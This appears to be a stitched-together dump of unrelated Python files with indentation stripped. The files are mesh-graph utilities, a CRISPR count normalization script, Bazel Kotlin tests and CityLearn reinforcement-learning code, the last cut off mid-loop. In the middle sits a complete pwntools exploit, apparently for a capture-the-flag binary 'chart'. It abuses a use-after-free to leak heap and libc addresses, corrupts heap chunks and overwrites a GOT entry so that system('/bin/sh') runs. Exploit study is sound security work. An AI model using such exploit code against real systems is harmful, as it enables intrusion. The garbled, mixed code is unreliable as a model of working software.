def add_new_node(self, n, D, polygon, position, display):
num = self.g.number_of_nodes()
self.g.add_node(num+1, position=position, device_reference=D, process_polygon=polygon, display=display)
self.g.add_edge(n, num+1)
def create_triangles(self):
if 'triangle' not in self.mesh_data.cells:
raise ValueError('Triangle not found in cells')
return self.mesh_data.cells['triangle']
def create_lines(self):
if 'line' not in self.mesh_data.cells:
raise ValueError('Line not found in cells')
return self.mesh_data.cells['line']
def create_physical_triangles(self):
if 'triangle' not in self.mesh_data.cell_data:
raise ValueError('Triangle not in meshio cell_data')
if 'gmsh:physical' not in self.mesh_data.cell_data['triangle']:
raise ValueError('Physical not found in meshio triangle')
return self.mesh_data.cell_data['triangle']['gmsh:physical'].tolist()
def create_physical_lines(self):
if 'line' not in self.mesh_data.cell_data:
raise ValueError('Line not in meshio cell_data')
if 'gmsh:physical' not in self.mesh_data.cell_data['line']:
raise ValueError('Physical not found in meshio line')
return self.mesh_data.cell_data['line']['gmsh:physical'].tolist()
def process_triangles(self):
"""
Arguments
---------
tri : list
The surface_id of the triangle
corresponding to the index value.
name -> 5_0_1 (layer_datatype_polyid)
value -> [1 2] (1=surface_id 2=triangle)
"""
triangles = {}
for name, value in self.mesh_data.field_data.items():
for n in self.g.nodes():
surface_id = value[0]
if self.physical_triangles[n] == surface_id:
layer = int(name.split('_')[0])
datatype = int(name.split('_')[1])
key = (layer, datatype)
if key in triangles:
triangles[key].append(n)
else:
triangles[key] = [n]
return triangles
def process_lines(self):
"""
Arguments
---------
tri : list
The surface_id of the triangle
corresponding to the index value.
name -> 5_0_1 (layer_datatype_polyid)
value -> [1 2] (1=surface_id 2=triangle)
"""
lines = {}
for name, value in self.mesh_data.field_data.items():
# print(name, value)
# print(self.physical_lines)
for n in self.physical_lines:
line_id = value[0]
if n == line_id:
# print(name)
# print(value)
# print('')
polygon_string = name.split('*')[0]
polygon_hash = name.split('*')[1]
polygon_uid = int(name.split('*')[2])
key = (polygon_string, polygon_hash, polygon_uid)
if key in lines:
lines[key].append(n)
else:
lines[key] = [n]
return lines
def get_triangles_connected_to_line(self):
"""
Labeling of an edge line:
polygon_uid_i [line elm_type]
[SPiRA: Polygon 'M5']_17_0 [2 1]
Labeling of triangle:
layer datatype [triangle elm_type]
50_1_0_0 [1 2]
"""
# lines = []
# for v in self.process_lines().values():
# lines.extend(v)
# print(lines)
# triangles = {}
# for n in nodes:
# for node, triangle in enumerate(self.triangles):
# if n == node:
# triangles[n] = triangle
# return triangles
def triangle_nodes(self):
""" Get triangle field_data in list form. """
nodes = []
for v in self.process_triangles().values():
nodes.extend(v)
triangles = {}
for n in nodes:
for node, triangle in enumerate(self.triangles):
if n == node:
triangles[n] = triangle
return triangles
def transform(self, transformation):
for n in self.g.nodes():
self.g.node[n]['position'] = transformation.apply_to_coord(self.g.node[n]['position'])
return self
def create_branch_nodes(self):
""" Nodes that defines different conducting branches. """
from spira.yevon.gdsii.sref import SRef
from spira.yevon.geometry.ports import Port
branch_nodes = list()
for n in self.g.nodes():
if 'device_reference' in self.g.node[n]:
D = self.g.node[n]['device_reference']
if isinstance(D, SRef):
branch_nodes.append(n)
if isinstance(D, Port):
branch_nodes.append(n)
return branch_nodes
def st_nodes(self):
""" Nodes that defines different conducting branches.
All nodes are ports. Chek port purposes.
"""
from spira.yevon.gdsii.sref import SRef
from spira.yevon.geometry.ports import Port
branch_nodes = list()
for n in self.g.nodes():
if 'device_reference' in self.g.node[n]:
D = self.g.node[n]['device_reference']
P = self.g.node[n]['process_polygon']
# FIXME: Maybe implement node operators (__and__, etc)
# if (D.purpose.symbol == 'B') and (P.layer.purpose.symbol == 'DEVICE_METAL'):
# branch_nodes.append(n)
if D.purpose.symbol == 'C':
branch_nodes.append(n)
elif D.purpose.symbol == 'D':
branch_nodes.append(n)
# elif D.purpose.symbol == 'P':
# branch_nodes.append(n)
elif D.purpose.symbol == 'T':
branch_nodes.append(n)
# elif (D.purpose.symbol == 'P') and (D.name[1] != 'E'):
# branch_nodes.append(n)
return branch_nodes
def convert_to_branch_node(self, n, uid):
pass
def del_branch_attrs(self):
""" Reset the branch attrs for new branch node creation. """
for n in self.g.nodes():
if 'branch_node' in self.g.node[n]:
del self.g.node[n]['branch_node']
return self
def convert_pins(self):
""" Remove pin node attrs with more than 1 edge connected to it. """
for n in self.g.nodes():
if 'device_reference' in self.g.node[n]:
D = self.g.node[n]['device_reference']
if D.purpose.symbol == 'P':
if len(self.g.edges(n)) > 0:
del self.g.node[n]['device_reference']
return self
def convert_device(self):
""" Convert a device metal node to a dummy port.
Has to be connected to at least 1 PEdge node. """
from spira.yevon.geometry.ports import Port
for n in self.g.nodes():
convert = False
P = self.g.node[n]['process_polygon']
if P.layer.purpose.symbol == 'DEVICE_METAL':
for i in self.g.neighbors(n):
if 'device_reference' in self.g.node[i]:
D = self.g.node[i]['device_reference']
# print(D)
if D.purpose.symbol == 'P':
convert = True
if convert is True:
port = Port(
name='Djj{}'.format(n),
midpoint=P.center,
process=P.layer.process,
)
self.g.node[n]['device_reference'] = port
return self
def remove_nodes(self):
"""
Nodes to be removed:
1. Are not a branch node.
2. Are not a device node.
3. Branch nodes must equal the branch id.
"""
from spira.yevon.gdsii.sref import SRef
from spira.yevon.geometry.ports import Port
locked_nodes = []
remove_nodes = []
for n in self.g.nodes():
if 'branch_node' in self.g.node[n]:
D = self.g.node[n]['branch_node']
if isinstance(D, Port):
locked_nodes.append(n)
elif 'device_reference' in self.g.node[n]:
D = self.g.node[n]['device_reference']
if isinstance(D, (Port, SRef)):
locked_nodes.append(n)
for n in self.g.nodes():
if n not in locked_nodes:
remove_nodes.append(n)
self.g.remove_nodes_from(remove_nodes)
def NetParameter(local_name=None, restriction=None, **kwargs):
R = RestrictType(Net) & restriction
return RestrictedParameter(local_name, restriction=R, **kwargs)
| 12,740 | 3,900 |
"""
Runs list_files on the current directory (".")
"""
from util import list_files
def main() -> None:
path = "."
files = list_files(path)
for f in files:
print(
"d" if f.isdir else "f",
f" {f.human_readable_bytes:<12}",
f.path
)
if __name__ == "__main__":
main()
| 337 | 120 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 13 09:23:51 2017
@author: philipp
"""
# Analyze count distribution
# =======================================================================
# Imports
from __future__ import division # floating point division by default
import sys
import yaml
import os
import glob
import pandas
import scipy.stats.mstats as sc
import numpy
import time
def Normalization():
# ------------------------------------------------
# Print header
# ------------------------------------------------
print('++++++++++++++++++++++++++++++++++++++++++++++++')
start = time.time()
# ------------------------------------------------
# Get parameters
# ------------------------------------------------
configFile = open('configuration.yaml','r')
config = yaml.safe_load(configFile)
configFile.close()
ScriptsDir = config['ScriptsDir']
sgRNAReadCountDir = config['sgRNAReadCountDir']
GeneReadCountDir = config['GeneReadCountDir']
delta = config['delta']
norm = config['Normalization']
RoundCount = config['RoundCount']
NormSuffix = '_normalized.txt'
N0 = 1000000
eps = 0.001
# ------------------------------------------------
# Get files
# ------------------------------------------------
os.chdir(sgRNAReadCountDir)
FileNames_u = glob.glob('*_GuideCounts.txt')
colnames_u = ['sgRNA','gene','counts']
os.chdir(GeneReadCountDir)
FileNames_g = glob.glob('*_GeneCounts.txt')
colnames_g = ['gene','counts']
# ------------------------------------------------
# Normalization to counts per million
# ------------------------------------------------
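# Each sample is rescaled so that its read counts sum to N0 = 1,000,000:
# normalized_count[k] = count[k] / sum(counts) * N0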
if norm == 'cpm':
print('Normalizing to counts per million reads ...')
# sgRNA counts
os.chdir(sgRNAReadCountDir)
for filename in FileNames_u:
print('Processing file '+filename+' ...')
GuideCounts = pandas.read_table(filename,sep='\t',names=colnames_u)
L = len(GuideCounts)
sgIDs = list(GuideCounts['sgRNA'])
geneIDs = list(GuideCounts['gene'])
ReadsPerGuide = list(GuideCounts['counts'])
N = sum(ReadsPerGuide)
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(ReadsPerGuide[k]/N * N0)) for k in range(L)]
else:
ReadsPerGuide_0 = [ReadsPerGuide[k]/N * N0 for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
print('Processing file '+filename+' ...')
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
N = sum(ReadsPerGene)
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/N * N0)) for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/N * N0 for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Normalization to mean total read count across replicates
# ------------------------------------------------------------
elif norm == 'total':
print('Normalizing to mean total read count ...')
os.chdir(sgRNAReadCountDir)
TotalCounts = list()
for filename in FileNames_u:
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
x = list(SampleFile['counts'])
TotalCounts.append(numpy.sum(x))
MeanCount = numpy.mean(TotalCounts)
# sgRNA counts
os.chdir(sgRNAReadCountDir)
for filename in FileNames_u:
print('Processing file '+filename+' ...')
GuideCounts = pandas.read_table(filename,sep='\t',names=colnames_u)
L = len(GuideCounts)
sgIDs = list(GuideCounts['sgRNA'])
geneIDs = list(GuideCounts['gene'])
ReadsPerGuide = list(GuideCounts['counts'])
N = sum(ReadsPerGuide)
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(ReadsPerGuide[k]/N * MeanCount)) for k in range(L)]
else:
ReadsPerGuide_0 = [ReadsPerGuide[k]/N * MeanCount for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
print('Processing file '+filename+' ...')
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
N = sum(ReadsPerGene)
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/N * MeanCount)) for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/N * MeanCount for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Normalization by size-factor (Love et al., Genome Biol 2014)
# ------------------------------------------------------------
elif norm == 'size':
print('Normalizing by size-factors ...')
# Establish data frame
os.chdir(sgRNAReadCountDir)
filename = FileNames_u[0]
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
sgIDs = list(SampleFile['sgRNA'])
geneIDs = list(SampleFile['gene'])
L = len(sgIDs)
RawCounts = pandas.DataFrame(data = {'sgRNA': [sgIDs[k] for k in range(L)],
'gene': [geneIDs[k] for k in range(L)]},
columns = ['sgRNA','gene'])
SizeFactors = pandas.DataFrame(data = {'sgRNA': [sgIDs[k] for k in range(L)],
'gene': [geneIDs[k] for k in range(L)]},
columns = ['sgRNA','gene'])
# Compute geometric means for all sgRNAs
print('Computing geometric means ...')
for filename in FileNames_u:
sample = filename[0:-16]
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
x = list(SampleFile['counts'])
RawCounts[sample] = x
SizeFactors[sample] = [x[k] if x[k]>0 else x[k]+eps for k in range(L)]
geomean = [sc.gmean(list(SizeFactors.iloc[k,2:])) for k in range(L)]
SizeFactors['Geom mean'] = geomean
# Compute size-factors for each sgRNA and each sample
print('Computing sgRNA size-factors ...')
for filename in FileNames_u:
sample = filename[0:-16]
x = SizeFactors[sample]
g0 = SizeFactors['Geom mean']
x0_k = [x[k]/g0[k] for k in range(L)]
SizeFactors[sample+' sgRNA size-factors'] = [x0_k[k] for k in range(L)]
# Compute size-factor for each sample
print('Computing sample size-factors ...')
for filename in FileNames_u:
sample = filename[0:-16]
SizeFactors[sample+' size-factor'] = numpy.median(SizeFactors[sample+' sgRNA size-factors'])
# Write size-factor dataframe
SizeFactors.to_csv('Size-factors.txt',sep='\t',index=False)
# Write normalized counts dataframe
print('Writing normalized read counts ...')
# sgRNA counts
for filename in FileNames_u:
sample = filename[0:-16]
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(RawCounts[sample][k]/SizeFactors[sample+' size-factor'][k])) \
for k in range(L)]
else:
ReadsPerGuide_0 = [RawCounts[sample][k]/SizeFactors[sample+' size-factor'][k] for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
sample = filename[0:-15]
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/SizeFactors[sample+' size-factor'][j])) \
for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/SizeFactors[sample+' size-factor'][j] for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Spelling error catch
# ------------------------------------------------------------
else:
print('### ERROR: Check spelling of Normalization parameter in configuration file! ###')
# --------------------------------------
# Time stamp
# --------------------------------------
os.chdir(ScriptsDir)
end = time.time()
# Final time stamp
print('------------------------------------------------')
print('Script completed.')
sec_elapsed = end - start
if sec_elapsed < 60:
time_elapsed = sec_elapsed
print('Time elapsed (Total) [secs]: ' + '%.3f' % time_elapsed +'\n')
elif sec_elapsed < 3600:
time_elapsed = sec_elapsed/60
print('Time elapsed (Total) [mins]: ' + '%.3f' % time_elapsed +'\n')
else:
time_elapsed = sec_elapsed/3600
print('Time elapsed (Total) [hours]: ' + '%.3f' % time_elapsed +'\n')
if __name__ == "__main__":
Normalization()
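# ----------------------------------------------------------------------
# Illustrative sketch (not called by the pipeline above): the median-of-ratios
# size factor of Love et al. (Genome Biol 2014) written with plain numpy.
# Unlike the 'size' branch above, which replaces zero counts with a small eps,
# this version simply drops guides that have a zero count in any sample.
# Shapes and names here are assumptions for demonstration only.
# ----------------------------------------------------------------------
def _size_factors_sketch(counts):
    """counts: numpy array of shape (n_guides, n_samples) of raw read counts."""
    counts = numpy.asarray(counts, dtype=float)
    keep = (counts > 0).all(axis=1)                      # drop guides with any zero count
    log_geomean = numpy.log(counts[keep]).mean(axis=1)   # per-guide geometric mean (in log space)
    ratios = counts[keep] / numpy.exp(log_geomean)[:, None]
    return numpy.median(ratios, axis=0)                  # one size factor per sample
# Normalized counts would then be: counts / _size_factors_sketch(counts)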
| 11,846 | 3,605 |
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from common import BazelKotlinTestCase
class TestRules(BazelKotlinTestCase):
def setUp(self):
self._pkg = "tests/smoke"
def test_merge_resource_jar(self):
jar = self.buildJarGetZipFile("test_merge_resourcesjar", "jar")
self.assertJarContains(jar, "testresources/AClass.class", "testresources/BClass.class")
self.assertJarContains(jar, "pkg/file.txt")
def test_embed_resources(self):
jar = self.buildJarGetZipFile("test_embed_resources", "jar")
self.assertJarContains(jar, "testresources/AClass.class", "testresources/BClass.class")
self.assertJarContains(jar, "tests/smoke/testresources/resources/one/two/aFile.txt", "tests/smoke/testresources/resources/one/alsoAFile.txt")
def test_embed_resources_strip_prefix(self):
jar = self.buildJarGetZipFile("test_embed_resources_strip_prefix", "jar")
self.assertJarContains(jar, "testresources/AClass.class", "testresources/BClass.class")
self.assertJarContains(jar, "one/two/aFile.txt", "one/alsoAFile.txt")
def test_test_targets_launch_correctly(self):
self.buildLaunchExpectingSuccess("junittest", command="test")
def test_bin_targets_launch_correctly_with_data(self):
self.buildLaunchExpectingSuccess("helloworld")
def test_conventional_strip_resources(self):
jar = self.buildJarGetZipFile("conventional_strip_resources", "jar")
self.assertJarContains(jar, "main.txt", "test.txt")
def test_export_ct_propagation(self):
self.buildJar("propagation_ct_consumer")
def test_export_ct_propagation_fail_on_runtime(self):
self.buildJarExpectingFail("propagation_ct_consumer_fail_on_runtime")
def test_export_rt_propagation(self):
self.buildLaunchExpectingSuccess("propagation_rt_via_export_consumer")
def test_export_rt_propagation_via_dep(self):
self.buildLaunchExpectingSuccess("propagation_rt_via_runtime_deps_consumer")
def test_mixed_mode_compilation(self):
self.buildLaunchExpectingSuccess("hellojava")
# re-enable this test, and ensure the srcjar includes java sources when mixed mode.
# def test_srcjar(self):
# jar = self.buildJarGetZipFile("testresources", "srcjar")
# self.assertJarContains(jar, "testresources/AClass.kttestresources/ConsumerLib.kt")
if __name__ == '__main__':
unittest.main()
| 3,022 | 966 |
from pwn import *
r = process("./chart")
raw_input("$")
def register(type_, ID, PW, name, profile=""): # user 1, composer 2
r.send("2\n")
print r.recvuntil("Type :")
r.send(str(type_)+"\n")
print r.recvuntil("ID : ")
r.send(ID+"\n")
print r.recvuntil("PW : ")
r.send(PW+"\n")
print r.recvuntil("Name : ")
r.send(name+"\n")
if(type_ == 1):
print r.recvuntil(">")
else:
print r.recvuntil("Profile : ")
r.send(profile+"\n")
print r.recvuntil(">")
def login(ID, PW):
r.send("1\n")
print r.recvuntil("ID :")
r.send(ID+"\n")
print r.recvuntil("PW :")
r.send(PW+"\n")
print r.recvuntil(">")
def writeMusic(name, lyric):
r.send("1\n")
print r.recvuntil("Name : ")
r.send(name+"\n")
print r.recvuntil("Lyrics : ")
r.send(lyric+"\n")
print r.recvuntil(">")
def deleteMusic(index):
r.send("2\n")
print r.recvuntil("Index : ")
r.send(str(index)+"\n")
print r.recvuntil(">")
def editProfile(newProfile):
r.send("3\n")
print r.recvuntil("Edit Profile : ")
r.send(newProfile+"\n")
print r.recvuntil(">")
def editMusic(musicIdx, newLyric):
r.send("4\n")
print r.recvuntil("Index :")
r.send(str(musicIdx)+"\n")
r.send(newLyric+"\n")
print r.recvuntil(">")
def logOut(type_):
if type_== 1: # user
r.send("9\n")
print r.recvuntil(">")
else: # composer
r.send("5\n")
print r.recvuntil(">")
def createVeryBox(boxName):
r.send("1\n")
print r.recvuntil("Box Name :")
r.send(boxName+"\n")
print r.recvuntil(">")
def deleteVeryBox(boxIndex):
r.send("2\n")
print r.recvuntil("Index :")
r.send(str(boxIndex)+"\n")
print r.recvuntil(">")
def buyMusic(index):
r.send("3\n")
print r.recvuntil("Index :")
r.send(str(index)+"\n")
print r.recvuntil(">")
def putMusicBox(boxIndex, musicIndex):
r.send("4\n")
print r.recvuntil("box :")
r.send(str(boxIndex)+"\n")
print r.recvuntil("box? > ")
r.send(str(musicIndex)+"\n")
print r.recvuntil(">")
def moveBox2Box(destIdx, srcIdx, x, y):
r.send("5\n")
print r.recvuntil("index :")
r.send(str(destIdx)+"\n")
print r.recvuntil("index :")
r.send(str(srcIdx)+"\n")
print r.recvuntil("x :")
r.send(str(x)+"\n")
print r.recvuntil("y :")
r.send(str(y)+"\n")
print r.recvuntil(">")
def deleteMusicU(musicIndex):
r.send("8\n")
print r.recvuntil("Index :")
r.send(str(musicIndex)+"\n")
print r.recvuntil(">")
print r.recvuntil(">")
register(1, "mathboy", "mathboy", "mathboy")
register(2, "mitsuha", "mitsuha", "mitsuha", "A"*0x40)
login("mitsuha", "mitsuha") # composer now!
writeMusic("music1", "music1 hello")
writeMusic("sex", "sex")
logOut(2) # composer logout
register(2, "sexma", "sex", "sex", "B"*0x40) # for attack
login("sexma", "sex") # write for attackvec
writeMusic("aaaaaaaa", "b"*0x39) # write for attackvec, music idx=2
logOut(2)
login("mathboy", "mathboy") # user now!
createVeryBox("myBox")
buyMusic(0)
putMusicBox(0, 0) # go music0 to box 0.
deleteMusicU(0)
logOut(1) # user logout
login("mitsuha", "mitsuha")
deleteMusic(0)
logOut(2)
login("mathboy", "mathboy") # user again!
moveBox2Box(0, 0, 0, 0) # 0, 0 -> 0, 0, triggers the reference-counting bug.
createVeryBox(p64(0x607340)+"\n")
r.send("6\n")
print r.recvuntil("--\n0. ")
recved = r.recvuntil("\n")[:-1]
recved += "\x00"*(8-len(recved))
heap = u64(recved)
print r.recvuntil(">")
print "heap addr: " + hex(heap)
createVeryBox("sexMaster") # second box
buyMusic(1)
putMusicBox(2, 0) # go music1 to box 2
deleteMusicU(0)
logOut(1)
login("mitsuha", "mitsuha")
deleteMusic(1)
logOut(2)
login("mathboy", "mathboy")
moveBox2Box(2, 2, 0, 0)
logOut(1) # logout User
login("mitsuha", "mitsuha")
editProfile(p64(heap+0x350)+p64(0x0)+"A"*8+p64(heap-0x270))
logOut(2) # logout Composer
register(1, p64(heap+0xc0), "P"*0x40, "Q"*0x40)
login("sexma", "sex") # login for attack
editProfile("B"*0x30+p64(0x0)+p64(0x71))
editMusic(2, p64(0x0)+p64(0x21)+"b"*0x20+p64(0x0)+"\x21")
logOut(2)
login("mathboy", "mathboy")
deleteVeryBox(2)
logOut(1) # logout User
register(2, "payload", "payload", "payload", "A"*0x60) # overlapped!
login("payload", "payload")
payload = p64(0x0) + p64(0x31)
payload += p64(heap+0x3b0)
payload += p64(0x605030)
editProfile(payload)
logOut(2)
login("mathboy", "mathboy")
buyMusic(2)
r.send("7\n")
print r.recvuntil("Lyrics : ")
recved = r.recv(6)
libc = u64(recved+"\x00\x00")
libc_base = libc - 0x66bf10
system = libc_base + 0x45390
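# NOTE: 0x66bf10 and 0x45390 are hard-coded offsets specific to the target's libc build.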
print r.recvuntil(">")
print "libc: " + hex(libc)
logOut(1)
login("sexma", "sex") # to edit
editMusic(2, p64(system)[:6]) # got overwrite!
logOut(2)
login("mathboy", "mathboy")
createVeryBox("/bin/sh")
r.send("2\n")
print r.recvuntil("Index :")
r.send("2\n") # trigger system("/bin/sh")!
r.interactive()
| 4,655 | 2,236 |
from citylearn import CityLearn, building_loader, auto_size
from energy_models import HeatPump, EnergyStorage, Building
import matplotlib.pyplot as plt
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
import collections
import gym
from gym.utils import seeding
from gym import core, spaces
import os
import ptan
import time
import argparse
import model, common
from matplotlib.pyplot import figure
import numpy as np
class AgentD4PG(ptan.agent.BaseAgent):
"""
Agent that adds Gaussian exploration noise to the actor's actions
"""
def __init__(self, net, device="cpu", epsilon=1.0):
self.net = net
self.device = device
self.epsilon = epsilon
def __call__(self, states, agent_states):
states_v = ptan.agent.float32_preprocessor(states).to(self.device)
mu_v = self.net(states_v)
actions = mu_v.data.cpu().numpy()
actions += self.epsilon * np.random.normal(size=actions.shape)
actions = np.clip(actions, -1, 1)
return actions, agent_states
class DDPGActor(nn.Module):
def __init__(self, obs_size, act_size):
super(DDPGActor, self).__init__()
self.net = nn.Sequential(
nn.Linear(obs_size, 4),
nn.ReLU(),
nn.Linear(4, 4),
nn.ReLU(),
nn.Linear(4, act_size),
nn.Tanh()
)
def forward(self, x):
return self.net(x)
class DDPGCritic(nn.Module):
def __init__(self, obs_size, act_size):
super(DDPGCritic, self).__init__()
self.obs_net = nn.Sequential(
nn.Linear(obs_size, 8),
nn.BatchNorm1d(8),
nn.ReLU(),
)
self.out_net = nn.Sequential(
nn.Linear(8 + act_size, 6),
nn.BatchNorm1d(6),
nn.ReLU(),
nn.Linear(6, 1)
)
def forward(self, x, a):
obs = self.obs_net(x)
return self.out_net(torch.cat([obs, a], dim=1))
from pathlib import Path
data_folder = Path("data/")
demand_file = data_folder / "AustinResidential_TH.csv"
weather_file = data_folder / 'Austin_Airp_TX-hour.csv'
#building_ids = [4, 5, 9, 16, 21, 26, 33, 36, 49, 59]
building_ids = [4]
heat_pump, heat_tank, cooling_tank = {}, {}, {}
#Ref: Assessment of energy efficiency in electric storage water heaters (2008 Energy and Buildings)
loss_factor = 0.19/24
buildings = {}
for uid in building_ids:
heat_pump[uid] = HeatPump(nominal_power = 9e12, eta_tech = 0.22, t_target_heating = 45, t_target_cooling = 10)
heat_tank[uid] = EnergyStorage(capacity = 9e12, loss_coeff = loss_factor)
cooling_tank[uid] = EnergyStorage(capacity = 9e12, loss_coeff = loss_factor)
buildings[uid] = Building(uid, heating_storage = heat_tank[uid], cooling_storage = cooling_tank[uid], heating_device = heat_pump[uid], cooling_device = heat_pump[uid])
buildings[uid].state_action_space(np.array([24.0, 40.0, 1.001]), np.array([1.0, 17.0, -0.001]), np.array([0.5]), np.array([-0.5]))
building_loader(demand_file, weather_file, buildings)
auto_size(buildings, t_target_heating = 45, t_target_cooling = 10)
env = {}
for uid in building_ids:
env[uid] = CityLearn(demand_file, weather_file, buildings = {uid: buildings[uid]}, time_resolution = 1, simulation_period = (3500,6000))
env[uid](uid)
if __name__ == "__main__":
N_AGENTS = 2
GAMMA = 0.99
BATCH_SIZE = 5000
LEARNING_RATE_ACTOR = 1e-4
LEARNING_RATE_CRITIC = 1e-3
REPLAY_SIZE = 5000
REPLAY_INITIAL = 100
TEST_ITERS = 120
EPSILON_DECAY_LAST_FRAME = 1000
EPSILON_START = 1.2
EPSILON_FINAL = 0.02
device = torch.device("cpu")
act_net, crt_net, tgt_act_net, tgt_crt_net, agent, exp_source, buffer, act_opt, crt_opt, frame_idx = {}, {}, {}, {}, {}, {}, {}, {}, {}, {}
rew_last_1000, rew, track_loss_critic, track_loss_actor = {}, {}, {}, {}
# for uid in buildings:
# env[uid].reset()
for uid in building_ids:
#Create as many actor and critic nets as number of agents
#Actor: states_agent_i -> actions_agent_i
act_net[uid] = DDPGActor(buildings[uid].observation_spaces.shape[0], buildings[uid].action_spaces.shape[0]).to(device)
#Critic: states_all_agents + actions_all_agents -> Q-value_agent_i [1]
crt_net[uid] = DDPGCritic(buildings[uid].observation_spaces.shape[0], buildings[uid].action_spaces.shape[0]).to(device)
tgt_act_net[uid] = ptan.agent.TargetNet(act_net[uid])
tgt_crt_net[uid] = ptan.agent.TargetNet(crt_net[uid])
agent[uid] = model.AgentD4PG(act_net[uid], device=device)
exp_source[uid] = ptan.experience.ExperienceSourceFirstLast(env[uid], agent[uid], gamma=GAMMA, steps_count=1)
buffer[uid] = ptan.experience.ExperienceReplayBuffer(exp_source[uid], buffer_size=REPLAY_SIZE)
act_opt[uid] = optim.Adam(act_net[uid].parameters(), lr=LEARNING_RATE_ACTOR)
crt_opt[uid] = optim.Adam(crt_net[uid].parameters(), lr=LEARNING_RATE_CRITIC)
frame_idx[uid] = 0
rew_last_1000[uid], rew[uid], track_loss_critic[uid], track_loss_actor[uid] = [], [], [], []
batch, states_v, actions_v, rewards_v, dones_mask, last_states_v, q_v, last_act_v, q_last_v, q_ref_v, critic_loss_v, cur_actions_v, actor_loss_v = {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}
cost, price_list, buffer_reward = {},{},{}
for uid in buildings:
cost[uid] = []
price_list[uid] = []
buffer_reward[uid] = []
while not env[building_ids[-1]]._terminal():
if frame_idx[building_ids[-1]] % 100 == 0:
print(frame_idx[building_ids[-1]])
for uid in buildings:
# print(env[uid].time_step)
agent[uid].epsilon = max(EPSILON_FINAL, EPSILON_START - frame_idx[uid] / EPSILON_DECAY_LAST_FRAME)
frame_idx[uid] += 1
buffer[uid].populate(1)
# print(buffer[uid].buffer[-1])
# print(env[uid].buildings[uid].time_step)
price = env[uid].total_electric_consumption[-1]*3e-5 + 0.045
price_list[uid].append(price)
for uid in buildings:
buffer_reward[uid].append(buffer[uid].buffer[-1].reward)
electricity_cost = buffer[uid].buffer[-1].reward*price
cost[uid].append(-electricity_cost)
buffer[uid].buffer[-1] = buffer[uid].buffer[-1]._replace(reward=electricity_cost)
if len(buffer[uid]) < REPLAY_INITIAL:
continue
for uid in buildings:
for k in range(6):
batch[uid] = buffer[uid].sample(BATCH_SIZE)
states_v[uid], actions_v[uid], rewards_v[uid], dones_mask[uid], last_states_v[uid] = common.unpack_batch_ddqn(batch[uid], device)
# TRAIN CRITIC
crt_opt[uid].zero_grad()
#Obtaining Q' using critic net with parameters teta_Q'
q_v[uid] = crt_net[uid](states_v[uid], actions_v[uid])
#Obtaining estimated optimal actions a|theta_mu from target actor net and from s_i+1.
